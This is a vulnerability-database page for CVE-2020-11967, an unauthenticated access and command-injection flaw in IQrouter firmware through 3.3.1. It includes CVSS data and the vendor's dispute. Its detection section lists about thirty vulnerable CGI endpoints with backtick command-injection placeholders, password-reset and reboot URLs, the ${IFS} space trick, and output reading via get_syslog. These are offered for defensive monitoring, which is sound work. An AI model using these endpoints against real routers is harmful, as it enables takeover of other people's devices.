cbcvebase.
CVE-2020-11967
published 2020-04-21

CVE-2020-11967: In IQrouter through 3.3.1, remote attackers can control the device (restart network, reboot, upgrade, reset) because of Incorrect Access Control. Note: The…

PriorityP265critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.19%
86.5th percentile
In IQrouter through 3.3.1, remote attackers can control the device (restart network, reboot, upgrade, reset) because of Incorrect Access Control. Note: The vendor claims that this vulnerability can only occur on a brand-new network that, after initiating the forced initial configuration (which has a required step for setting a secure password on the system), makes this CVE invalid. This vulnerability is “true for any unconfigured release of OpenWRT, and true of many other new Linux distros prior to being configured for the first time”

Affected

1 ranges
VendorProductVersion rangeFixed in
evenrouteiqrouter_firmware<= 3.3.1

Detection & IOCsextracted from sources · hover to see the quote

url/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'
url/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'
url/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2
url/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2
url/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'
url/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2
url/cgi-bin/luci/er/screen4?save_isp='`{}`
url/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'
url/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'
url/cgi-bin/luci/er/screen10?set_security_question='`{}`'
url/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1
url/cgi-bin/luci/er/screen1?zonename='`{}`'
url/cgi-bin/luci/er/register?email=`{}`
url/cgi-bin/luci/er/reboot_link?link='`{}`'
url/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/
url/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/
url/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/
url/cgi-bin/luci/er/diag_set_device_name/'`{}`'/
url/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/
url/cgi-bin/luci/er/advanced_link?link='`{}`'
url/cgi-bin/luci/er/reboot_link?reboot=1
url/cgi-bin/luci/er/screen2?reboot=1
url/cgi-bin/luci/er/index?reset_config=1
url/cgi-bin/luci/er/screen7?upgrade=1
url/cgi-bin/luci/er/vlanTag?restart_network=1
url/cgi-bin/luci/er/get_syslog
url/cgi-bin/luci/er/diag_set_password/c00lpasswd/
url/cgi-bin/luci/er/reset_password/
url/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123
url/cgi-bin/luci/er/diag_iperf_cmd/start
url/cgi-bin/luci/er/diag_iperf_cmd/stop
  • All vulnerable CGI endpoints are under /cgi-bin/luci/er/ and require NO authentication on unconfigured devices; monitor for unauthenticated HTTP GET requests to any path matching /cgi-bin/luci/er/* from external/untrusted sources.
  • Shell command injection is delivered via backtick syntax (e.g., '`<cmd>`') in GET parameters; detect HTTP requests to /cgi-bin/luci/er/* containing backtick characters in query strings or URL path segments.
  • The exploit uses ${IFS} as a space substitute in injected shell commands; alert on URL-encoded or literal ${IFS} appearing in HTTP request parameters targeting /cgi-bin/luci/er/* endpoints.
  • Unauthenticated access to /cgi-bin/luci/er/reset_password/ or /cgi-bin/luci/er/diag_set_password/* indicates an attacker attempting to take over root credentials; treat any such request as a high-severity incident.
  • Exfiltration of command output is performed by reading /cgi-bin/luci/er/get_syslog after injection via /cgi-bin/luci/er/register?email=; correlate POST/GET to register with a subsequent GET to get_syslog from the same source IP.
  • ·The vendor states the vulnerability only applies to brand-new, unconfigured devices; once the mandatory initial setup (including setting a secure password) is completed, the unauthenticated access is no longer present.
  • ·The exploit targets IQrouter firmware versions up to and including 3.3.1; devices on later firmware or with completed setup are not affected by the unauthenticated control endpoints.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:N/C:P/I:P/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.